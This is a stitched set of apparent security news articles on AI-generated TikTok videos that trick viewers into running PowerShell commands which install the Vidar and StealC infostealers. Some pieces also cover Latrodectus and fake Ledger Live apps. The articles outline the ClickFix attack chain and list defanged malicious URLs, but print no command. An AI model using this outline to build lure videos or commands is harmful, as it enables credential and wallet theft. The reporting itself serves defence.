AI-Generated TikTok Videos Spread Malware Through Deceptive Tutorials

Warning: AI-Generated TikTok Videos Want to Trick You Into Installing Malware

Cybercriminals are using AI to create fake tutorials on TikTok to trick you into downloading information-stealing malware on your PCs, according to cybersecurity firm Trend Micro. The campaign is built around the virality of TikTok videos that promise free access to popular software. Examples include videos demonstrating free ways to install Windows and Microsoft Office or to access premium versions of apps like Spotify and CapCut. In the videos, scammers provide step-by-step instructions to run a PowerShell script via voiceover or by displaying them on the screen. "There is no malicious code present on the platform [TikTok] for security solutions to analyze or block," Trend Micro says. These scripts might appear legitimate at first, but they are "designed to socially engineer viewers into running a PowerShell command that downloads and executes a remote script, ultimately compromising their system," the researchers add. Directories installed in the process are then added to the Windows Defender exclusion list to avoid detection. They also download a secondary payload to deploy Vidar or StealC malware, which can be used to get access to your login credentials, credit card data, 2FA codes, and more. For threat actors, TikTok's algorithm helps scale their attack quickly. One such deceptive video, captioned "Boost your Spotify Experience instantly," has garnered nearly 500,000 views. The use of AI-generated content also elevates these kinds of attacks as "videos can be rapidly produced and tailored to target different user segments," the researchers say. To avoid falling for these traps, Trend Micro encourages users to approach unsolicited technical instructions with caution, verify the legitimacy of video sources, and report suspicious posts on social media, messaging apps, or email. Additionally, it's best to avoid running PowerShell commands you don't fully understand or that don't come from a trusted source. You should also avoid direct downloads from unknown URLs.

TikTok videos now push infostealer malware in ClickFix attacks

Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks. As Trend Micro recently discovered, the threat actors behind this TikTok social engineering campaign are using videos likely generated using AI that ask viewers to run commands claiming to activate Windows and Microsoft Office, as well as premium features in various legitimate software like CapCut and Spotify. "This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps. TikTok's algorithmic reach increases the likelihood of widespread exposure, with one video reaching more than half a million views," Trend Micro said. "The videos are highly similar, with only minor differences in camera angles and the download URLs used by PowerShell to fetch the payload," it added. "These suggest that the videos were likely created through automation. The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos." One of the videos claiming to provide instructions on how to "boost your Spotify experience instantly," has reached almost 500,000 views, with over 20,000 likes and more than 100 comments. In the video, the attackers prompt viewers to run a PowerShell command that will instead download and execute a remote script from hxxps://allaivo[.]me/spotify that installs Vidar or StealC information-stealing malware, launching it as a hidden process with elevated permissions. After being deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases. Stealc can also harvest a wide range of sensitive information from infected computers as it targets dozens of web browsers and cryptocurrency wallets. After the device is compromised, the script will download a second PowerShell script payload from hxxps://amssh[.]co/script[.]ps1 that will add a registry key to launch at startup automatically. ClickFix is a tactic where attackers employ fake errors or verification systems, such as CAPTCHA prompts, to trick potential targets into running malicious scripts to download and install malware on their devices. While generally targeting Windows users through PowerShell commands, ClickFix has also been adopted in attacks against macOS and Linux users. State-sponsored threat groups have also hacked their targets in similar attacks, with APT28 and ColdRiver (Russia), Kimsuky (North Korea), and MuddyWater (Iran) having all used these tactics in espionage campaigns in recent months. This is not the first time TikTok videos were used to push malware, with cybercriminals capitalizing on a trending TikTok challenge named 'Invisible Challenge' to infect thousands with a fake app that installed WASP Stealer (Discord Token Grabber) malware. The malware was pushed through videos that received over a million views shortly after being posted and can steal Discord accounts, passwords, credit cards, and cryptocurrency wallets. In recent years, scammers have also been flooding TikTok with fake cryptocurrency giveaways, almost all using Elon Musk, Tesla, or SpaceX themes.

Hackers Use TikTok Videos to Distribute Vidar and StealC Malware via ClickFix Technique

The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector. "The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security tools to detect or block the malware." Latrodectus, believed to be a successor to IcedID, is the name given to a malware that acts as a downloader for other payloads, such as ransomware. It was first documented by Proofpoint and Team Cymru in April 2024. Incidentally, the malware is one among the many malicious software to suffer an operational setback as part of Operation Endgame, which took down 300 servers worldwide and neutralized 650 domains related to Bumblebee, Lactrodectus, QakBot, HijackLoader, DanaBot, TrickBot, and WARMCOOKIE between May 19 and 22, 2025. In the latest set of Latrodectus attacks observed by Expel in May 2025, unsuspecting users are tricked into copying and executing a PowerShell command from an infected website, a tactic that has become a prevalent method to distribute a wide range of malware. "When run by a user, these commands will attempt to install a file located at the remote URL using MSIExec, and then execute it in memory," Expel said. "This keeps the attacker from having to write the file to the computer and risk being detected by the browser or an antivirus that might detect it on disk." The MSI installer contains a legitimate application from NVIDIA, which is used to sideload a malicious DLL, which then uses curl to download the main payload. To mitigate attacks of this type, it's advised to disable the Windows Run program using Group Policy Objects (GPOs) or turn off the "Windows + R" hot key via a Windows Registry change. From ClickFix to TikTok The disclosure comes as Trend Micro revealed details of a new engineering campaign that instead of relying on fake CAPTCHA pages employs TikTok videos likely generated using artificial intelligence (AI) tools to deliver the Vidar and StealC information stealers by instructing users to run malicious commands on their systems to activate Windows, Microsoft Office, CapCut, and Spotify. These videos have been posted from various TikTok accounts such as @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. These accounts are no longer active. One of the videos claiming to provide instructions on how to "boost your Spotify experience instantly" has amassed nearly 500,000 views, with over 20,000 likes and more than 100 comments. The campaign marks a new escalation of ClickFix in that users searching for ways to activate pirated apps are verbally and visually guided to open the Windows Run dialog by pressing the "Windows + R" hot key, launch PowerShell, and run the command highlighted in the video, ultimately compromising their own systems. "Threat actors are now using TikTok videos that are potentially generated using AI-powered tools to socially engineer users into executing PowerShell commands under the guise of guiding them to activate legitimate software or unlock premium features," security researcher Junestherry Dela Cruz said. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware." Fake Ledger Apps Used to Steal Mac Users' Seed Phrases The findings also follow the discovery of four different malware campaigns that leverage a cloned version of the Ledger Live app to steal sensitive data, including seed phrases, with the goal of draining victims' cryptocurrency wallets. The activity has been ongoing since August 2024. The attacks make use of the malicious DMG files that, when launched, launches AppleScript to exfiltrate passwords and Apple Notes data, and then download a trojanized version of Ledger Live. Once the app is opened, it warns users of a supposed account problem and that it requires their seed phrase for recovery. The entered seed phrase is sent to an attacker-controlled server. Moonlock Lab, which shed light on the campaign, said the rogue apps make use of macOS stealer malware like Atomic macOS Stealer (AMOS) and Odyssey, the latter of which introduced the novel phishing scheme in March 2025. It's worth noting that the activity overlaps with a macOS infostealer campaign that targets Ledger Live users through PyInstaller-packed binaries, as revealed by Jamf this month. "On dark web forums, chatter around anti-Ledger schemes is growing. The next wave is already taking shape," MacPaw's cybersecurity division noted. "Hackers will continue to exploit the trust crypto owners place in Ledger Live."

TikTok fans beware - experts warn dangerous malware spread by AI fake videos

The clips were AI-generated and trick the victims into downloading infostealers Hackers are posting AI-generated videos on TikTok to trick users into downloading infostealing malware, cybersecurity researchers Trend Micro have warned. The premise is simple: the attackers use AI to generate numerous videos demonstrating how to easily "activate" Windows and Microsoft Office, or enable "premium features" in apps such as Spotify or CapCut. They then share these videos on TikTok, whose algorithm makes it more likely to turn the video viral, making the success of the attack more likely. In the clip, a person is shown bringing up the Run program on Windows, and then executing a PowerShell command. While in the video the command results in the activation of special features, in reality, users running the command would download a malicious script which, in turn, deploys Vidar and StealC infostealers. These infostealers can take screenshots, steal login credentials, grab credit card data, exfiltrate cookies, cryptocurrency wallet information, 2FA codes, and more. "This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps. TikTok's algorithmic reach increases the likelihood of widespread exposure, with one video reaching more than half a million views," Trend Micro said. "The videos are highly similar, with only minor differences in camera angles and the download URLs used by PowerShell to fetch the payload," the researchers added. "These suggest that the videos were likely created through automation. The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos." One of the videos has roughly 500,000 views, more than 20,000 likes, and more than 100 comments, making it quite successful. Videos were being used to deliver malware in the past, too, but this new campaign is a significant departure from earlier methods. The difference is that before, the link to the malware was shared in the video's description, or comment, where it could still be picked up by security solutions. By delivering the bait in a video format, the attackers successfully bypass almost all security measures.

These AI-Generated TikTok Videos Are Tricking People Into Installing Malware

In recent years, TikTok has become a prime target for scammers and cyber attackers spreading various forms of malware, and the latest shady campaign promotes instructional videos that trick users into downloading infostealers to their devices via ClickFix attacks. The scheme, identified by Trend Micro and reported by Bleeping Computer, instructs users to execute commands to activate Windows and Microsoft Office or premium features in CapCut and Spotify. One video is captioned "Boost Your Spotify Experience Instantly -- Here's How!" and has nearly half a million views. These videos seem to be AI generated and, while the software they discuss is legitimate, the activation steps they outline are not, and will ultimately lead users to infect their devices with Vidar and StealC malware. TikTok's engagement algorithm makes it easy for such malicious videos to spread. In the past, cybercriminals have used TikTok's trending "Invisible Challenge" to spread WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake cryptocurrency giveaways posted on TikTok used deepfakes of Elon Musk (and themes around SpaceX and Tesla) to scam users into paying "activation" deposits using Bitcoin. ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command with malicious code. Users will see a pop-up notification about a technical problem with instructions to copy and run a command (commonly a PowerShell script) to "fix" the issue. The attack most often targets Windows users, but it has been employed on macOS and Linux too. In the current TikTok campaign, the instructional videos prompt users to run a PowerShell command that installs Vidar or StealC information-stealing malware. The former can take desktop screenshots and harvest data ranging from login credentials and cookies to credit cards and crypto wallets. The latter targets web browsers and crypto wallets. Once run, the script will download a second PowerShell script allowing it to launch automatically upon device startup. It also saves in a hidden directory and deletes temporary folders so it can evade detection. Be wary of following instructional videos you're served on TikTok (as well as unsolicited technical content in general). Check the source, and only engage with those that are legitimate, like from the developer itself. You should also look for signs of AI-generated content, which may be used to spread malware widely and rapidly. There's no malicious code actually embedded in or delivered by these instructional videos -- the scheme is dependent on social engineering via verbal directions -- making the threat technically harder to detect.